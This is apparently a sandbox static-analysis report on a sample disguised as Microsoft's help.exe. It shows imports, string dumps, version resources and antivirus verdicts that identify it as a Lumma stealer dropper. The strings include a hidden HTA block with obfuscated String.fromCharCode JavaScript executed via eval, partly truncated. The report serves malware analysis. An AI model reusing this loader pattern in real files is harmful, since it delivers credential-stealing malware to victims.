popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

PE Compile Time

2037-02-01 12:28:24

PDB Path

help.pdb

PE Imphash

611805a7c3221ebb521e87bf9182d982

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00001144 0x00001200 5.62249695483
.data 0x00003000 0x000003c0 0x00000200 0.183338791656
.idata 0x00004000 0x000004a6 0x00000600 4.22064067648
.rsrc 0x00005000 0x000007f0 0x00000800 4.34072862774
.reloc 0x00006000 0x00000178 0x00000200 5.12581075319

Resources

Name Offset Size Language Sub-language File type
MUI 0x00005728 0x000000c8 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_VERSION 0x00005398 0x00000390 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_MANIFEST 0x000050f0 0x000002a7 LANG_ENGLISH SUBLANG_ENGLISH_US XML 1.0 document, ASCII text, with CRLF line terminators

Imports

Library KERNEL32.dll:
0x404000 GetConsoleOutputCP
0x404004 GetStdHandle
0x404008 WriteFile
0x40400c SetThreadUILanguage
0x404010 GetConsoleMode
0x404014 FormatMessageW
0x404018 HeapSetInformation
0x40401c WriteConsoleW
0x404020 LocalFree
0x404024 WideCharToMultiByte
0x404028 GetFileType
0x40402c GetCurrentProcess
0x404034 GetTickCount
0x40403c GetCurrentThreadId
0x404040 GetCurrentProcessId
0x404048 GetModuleHandleW
0x404050 Sleep
0x404054 TerminateProcess
Library msvcrt.dll:
0x40405c __wgetmainargs
0x404060 __set_app_type
0x404064 __p__commode
0x404068 _exit
0x40406c _cexit
0x404070 __p__fmode
0x404074 __setusermatherr
0x404078 _initterm
0x40407c ?terminate@@YAXXZ
0x404080 _controlfp
0x404088 _amsg_exit
0x40408c _XcptFilter
0x404090 malloc
0x404094 _wcsnicmp
0x404098 free
0x40409c _wsystem
0x4040a0 wcscat_s
0x4040a4 wcscpy_s
0x4040a8 _ultow
0x4040ac setlocale
0x4040b0 exit
!This program cannot be run in DOS mode.
`.data
.idata
@.rsrc
@.reloc
help.pdb
.rdata$brc
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIY
.CRT$XIZ
.gfids
.rdata
.rdata$sxdata
.rdata$voltmd
.rdata$zzzdbg
.text$mn
.xdata$x
.idata$5
.00cfg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
<^ tKV
F95x3@
t#h|3@
GetConsoleOutputCP
GetStdHandle
WriteFile
SetThreadUILanguage
GetConsoleMode
FormatMessageW
HeapSetInformation
WriteConsoleW
LocalFree
WideCharToMultiByte
GetFileType
KERNEL32.dll
setlocale
_ultow
wcscpy_s
wcscat_s
_wsystem
_wcsnicmp
malloc
_XcptFilter
__p__commode
_amsg_exit
__wgetmainargs
__set_app_type
_cexit
__p__fmode
__setusermatherr
_initterm
msvcrt.dll
?terminate@@YAXXZ
_controlfp
_except_handler4_common
SetUnhandledExceptionFilter
GetModuleHandleW
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
GetTickCount
UnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
version="5.1.0.0"
processorArchitecture="x86"
name="Microsoft.Windows.Filesystem.Help"
type="win32"
<description>Command Line Help Utility</description>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="asInvoker"
uiAccess="false"
/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
0D0H0P0X0
515C5J5T5l5s5
9 9&9.9<9V9x9
:#:+:1:7:D:J:T:s:y:
;,;7;A;L;r;
<8===O=m=
=L>j>y>
0&0.0:0C0H0N0X0b0r0
1 1<1@1
!This program cannot be run in DOS mode.
`.data
.idata
@.rsrc
@.reloc
help.pdb
.rdata$brc
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIY
.CRT$XIZ
.gfids
.rdata
.rdata$sxdata
.rdata$voltmd
.rdata$zzzdbg
.text$mn
.xdata$x
.idata$5
.00cfg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
<^ tKV
F95x3@
t#h|3@
GetConsoleOutputCP
GetStdHandle
WriteFile
SetThreadUILanguage
GetConsoleMode
FormatMessageW
HeapSetInformation
WriteConsoleW
LocalFree
WideCharToMultiByte
GetFileType
KERNEL32.dll
setlocale
_ultow
wcscpy_s
wcscat_s
_wsystem
_wcsnicmp
malloc
_XcptFilter
__p__commode
_amsg_exit
__wgetmainargs
__set_app_type
_cexit
__p__fmode
__setusermatherr
_initterm
msvcrt.dll
?terminate@@YAXXZ
_controlfp
_except_handler4_common
SetUnhandledExceptionFilter
GetModuleHandleW
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
GetTickCount
UnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
version="5.1.0.0"
processorArchitecture="x86"
name="Microsoft.Windows.Filesystem.Help"
type="win32"
<description>Command Line Help Utility</description>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="asInvoker"
uiAccess="false"
/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
0D0H0P0X0
515C5J5T5l5s5
9 9&9.9<9V9x9
:#:+:1:7:D:J:T:s:y:
;,;7;A;L;r;
<8===O=m=
=L>j>y>
0&0.0:0C0H0N0X0b0r0
1 1<1@1
<HTA:APPLICATION CAPTION = "no" WINDOWSTATE = "minimize" SHOWINTASKBAR = "no" >MZ
!This program cannot be run in DOS mode.
`.data
.idata
@.rsrc
@.reloc
help.pdb
.rdata$brc
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIY
.CRT$XIZ
.gfids
.rdata
.rdata$sxdata
.rdata$voltmd
.rdata$zzzdbg
.text$mn
.xdata$x
.idata$5
.00cfg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
<^ tKV
F95x3@
t#h|3@
GetConsoleOutputCP
GetStdHandle
WriteFile
SetThreadUILanguage
GetConsoleMode
FormatMessageW
HeapSetInformation
WriteConsoleW
LocalFree
WideCharToMultiByte
GetFileType
KERNEL32.dll
setlocale
_ultow
wcscpy_s
wcscat_s
_wsystem
_wcsnicmp
malloc
_XcptFilter
__p__commode
_amsg_exit
__wgetmainargs
__set_app_type
_cexit
__p__fmode
__setusermatherr
_initterm
msvcrt.dll
?terminate@@YAXXZ
_controlfp
_except_handler4_common
SetUnhandledExceptionFilter
GetModuleHandleW
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
GetTickCount
UnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
version="5.1.0.0"
processorArchitecture="x86"
name="Microsoft.Windows.Filesystem.Help"
type="win32"
<description>Command Line Help Utility</description>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="asInvoker"
uiAccess="false"
/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
0D0H0P0X0
515C5J5T5l5s5
9 9&9.9<9V9x9
:#:+:1:7:D:J:T:s:y:
;,;7;A;L;r;
<8===O=m=
=L>j>y>
0&0.0:0C0H0N0X0b0r0
1 1<1@1
<script>
MJ=102;Gg=117;Ak=110;tA=99;GA=116;ON=105;Hv=111;qT=32;Vz=97;IA=71;ik=87;Ax=40;zz=66;cC=119;ge=68;aw=41;Xr=123;OG=118;CN=114;zi=100;gY=120;GR=61;zT=34;AF=59;SV=72;iS=81;Bc=48;JI=60;gB=46;Hq=108;Uc=101;aS=103;pQ=104;gj=43;QI=65;za=112;UJ=83;ej=109;yg=67;yX=91;kK=93;dp=45;OF=52;qm=50;xu=125;gy=49;ap=53;Ed=44;rh=51;dk=54;Yi=55;Fs=56;kI=57;xr=122;xZ=88;Kz=79;Ck=98;GJ=106;zk=82;
var vOt = String.fromCharCode(MJ,Gg,Ak,tA,GA,ON,Hv,Ak,qT,Vz,IA,ik,Ax,zz,cC,ge,aw,Xr,OG,Vz,CN,qT,IA,zi,gY,GR,qT,zT,zT,AF,MJ,Hv,CN,qT,Ax,OG,Vz,CN,qT,SV,IA,iS,qT,GR,qT,Bc,AF,qT,SV,IA,iS,qT,JI,qT,zz,cC,ge,gB,Hq,Uc,Ak,aS,GA,pQ,AF,qT,SV,IA,iS,gj,gj,aw,qT,Xr,OG,Vz,CN,qT,pQ,QI,za,qT,GR,qT,UJ,GA,CN,ON,Ak,aS,gB,MJ,CN,Hv,ej,yg,pQ,Vz,CN,yg,Hv,zi,Uc,Ax,zz,cC,ge,yX,SV,IA,iS,kK,qT,dp,qT,OF,qm,aw,AF,IA,zi,gY,qT,GR,qT,IA,zi,gY,qT,gj,qT,pQ,QI,za,xu,CN,Uc,GA,Gg,CN,Ak,qT,IA,zi,gY,xu,AF,OG,Vz,CN,qT,OG,QI,Uc,qT,GR,qT,Vz,IA,ik,Ax,yX,gy,ap,OF,Ed,gy,ap,rh,Ed,gy,dk,gy,Ed,gy,OF,rh,Ed,gy,ap,dk,Ed,gy,ap,Yi,Ed,gy,OF,dk,Ed,gy,OF,rh,Ed,gy,ap,Bc,Ed,gy,ap,Bc,Ed,Fs,Fs,Ed,gy,OF,rh,Ed,gy,dk,qm,Ed,gy,OF,rh,Ed,Yi,OF,Ed,Fs,Yi,Ed,gy,dk,gy,Ed,Yi,OF,Ed,gy,OF,dk,Ed,Yi,OF,Ed,Fs,Yi,Ed,gy,ap,qm,Ed,gy,ap,rh,Ed,gy,ap,OF,Ed,Yi,OF,Ed,Fs,Yi,Ed,gy,OF,rh,Ed,gy,ap,OF,Ed,Yi,OF,Ed,gy,ap,kI,Ed,gy,ap,qm,Ed,Yi,OF,Ed,Fs,Yi,Ed,gy,gy,gy,Ed,Yi,OF,Ed,gy,gy,dk,Ed,gy,Bc,Yi,Ed,gy,Bc,Fs,Ed,gy,gy,rh,Ed,gy,Bc,Yi,Ed,gy,gy,gy,Ed,gy,gy,kI,Ed,gy,Bc,Yi,Ed,gy,rh,kI,Ed,gy,OF,ap,Ed,gy,B
</script>MZ
!This program cannot be run in DOS mode.
`.data
.idata
@.rsrc
@.reloc
help.pdb
.rdata$brc
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIY
.CRT$XIZ
.gfids
.rdata
.rdata$sxdata
.rdata$voltmd
.rdata$zzzdbg
.text$mn
.xdata$x
.idata$5
.00cfg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
<^ tKV
F95x3@
t#h|3@
GetConsoleOutputCP
GetStdHandle
WriteFile
SetThreadUILanguage
GetConsoleMode
FormatMessageW
HeapSetInformation
WriteConsoleW
LocalFree
WideCharToMultiByte
GetFileType
KERNEL32.dll
setlocale
_ultow
wcscpy_s
wcscat_s
_wsystem
_wcsnicmp
malloc
_XcptFilter
__p__commode
_amsg_exit
__wgetmainargs
__set_app_type
_cexit
__p__fmode
__setusermatherr
_initterm
msvcrt.dll
?terminate@@YAXXZ
_controlfp
_except_handler4_common
SetUnhandledExceptionFilter
GetModuleHandleW
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
GetTickCount
UnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
version="5.1.0.0"
processorArchitecture="x86"
name="Microsoft.Windows.Filesystem.Help"
type="win32"
<description>Command Line Help Utility</description>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="asInvoker"
uiAccess="false"
/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
0D0H0P0X0
515C5J5T5l5s5
9 9&9.9<9V9x9
:#:+:1:7:D:J:T:s:y:
;,;7;A;L;r;
<8===O=m=
=L>j>y>
0&0.0:0C0H0N0X0b0r0
1 1<1@1
<script>
eval(vOt)
window.close();
</script>MZ
!This program cannot be run in DOS mode.
`.data
.idata
@.rsrc
@.reloc
help.pdb
.rdata$brc
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIY
.CRT$XIZ
.gfids
.rdata
.rdata$sxdata
.rdata$voltmd
.rdata$zzzdbg
.text$mn
.xdata$x
.idata$5
.00cfg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
<^ tKV
F95x3@
t#h|3@
GetConsoleOutputCP
GetStdHandle
WriteFile
SetThreadUILanguage
GetConsoleMode
FormatMessageW
HeapSetInformation
WriteConsoleW
LocalFree
WideCharToMultiByte
GetFileType
KERNEL32.dll
setlocale
_ultow
wcscpy_s
wcscat_s
_wsystem
_wcsnicmp
malloc
_XcptFilter
__p__commode
_amsg_exit
__wgetmainargs
__set_app_type
_cexit
__p__fmode
__setusermatherr
_initterm
msvcrt.dll
?terminate@@YAXXZ
_controlfp
_except_handler4_common
SetUnhandledExceptionFilter
GetModuleHandleW
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
GetTickCount
UnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
version="5.1.0.0"
processorArchitecture="x86"
name="Microsoft.Windows.Filesystem.Help"
type="win32"
<description>Command Line Help Utility</description>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="asInvoker"
uiAccess="false"
/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
0D0H0P0X0
515C5J5T5l5s5
9 9&9.9<9V9x9
:#:+:1:7:D:J:T:s:y:
;,;7;A;L;r;
<8===O=m=
=L>j>y>
0&0.0:0C0H0N0X0b0r0
1 1<1@1
Application
Unable to get Message-Not-Found message
Unable to display usage message
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Command Line Help Utility
FileVersion
10.0.20348.1 (WinBuild.160101.0800)
InternalName
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
Help.Exe
ProductName
Microsoft
Windows
Operating System
ProductVersion
10.0.20348.1
VarFileInfo
Translation
Application
Unable to get Message-Not-Found message
Unable to display usage message
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Command Line Help Utility
FileVersion
10.0.20348.1 (WinBuild.160101.0800)
InternalName
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
Help.Exe
ProductName
Microsoft
Windows
Operating System
ProductVersion
10.0.20348.1
VarFileInfo
Translation
Application
Unable to get Message-Not-Found message
Unable to display usage message
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Command Line Help Utility
FileVersion
10.0.20348.1 (WinBuild.160101.0800)
InternalName
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
Help.Exe
ProductName
Microsoft
Windows
Operating System
ProductVersion
10.0.20348.1
VarFileInfo
Translation
Application
Unable to get Message-Not-Found message
Unable to display usage message
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Command Line Help Utility
FileVersion
10.0.20348.1 (WinBuild.160101.0800)
InternalName
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
Help.Exe
ProductName
Microsoft
Windows
Operating System
ProductVersion
10.0.20348.1
VarFileInfo
Translation
Application
Unable to get Message-Not-Found message
Unable to display usage message
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Command Line Help Utility
FileVersion
10.0.20348.1 (WinBuild.160101.0800)
InternalName
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
Help.Exe
ProductName
Microsoft
Windows
Operating System
ProductVersion
10.0.20348.1
VarFileInfo
Translation
Antivirus Signature
Bkav Clean
Lionic Clean
Elastic malicious (high confidence)
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Cylance Unsafe
Zillya Clean
Sangfor Trojan.Win32.Agent.Vrqp
CrowdStrike win/malicious_confidence_60% (D)
Alibaba Trojan:Script/Lumma.8cdf307a
K7GW Clean
K7AntiVirus Clean
huorong Clean
Baidu Clean
VirIT Clean
Paloalto Clean
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 Clean
APEX Clean
Avast Win32:Lumma-E [Drp]
Cynet Clean
Kaspersky HEUR:Trojan.Script.Generic
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Tencent Clean
Sophos Troj/DwnLd-ARJ
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Clean
McAfeeD ti!3DCA1CA41315
Trapmine Clean
CTX Clean
Emsisoft Clean
Ikarus Win32.Outbreak
GData Clean
Jiangmin Clean
Webroot Clean
Varist Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Troj/DwnLd-ARJ
Microsoft Trojan:Win32/LummaStealer!rfn
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Artemis!060068E1F94B
TACHYON Clean
VBA32 Clean
Malwarebytes Clean
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Rising Trojan.Generic!8.C3 (CLOUD)
Yandex Clean
SentinelOne Clean
MaxSecure Clean
Fortinet W32/Agent.PWSL!tr
AVG Win32:Lumma-E [Drp]
DeepInstinct MALICIOUS
alibabacloud Clean
No IRMA results available.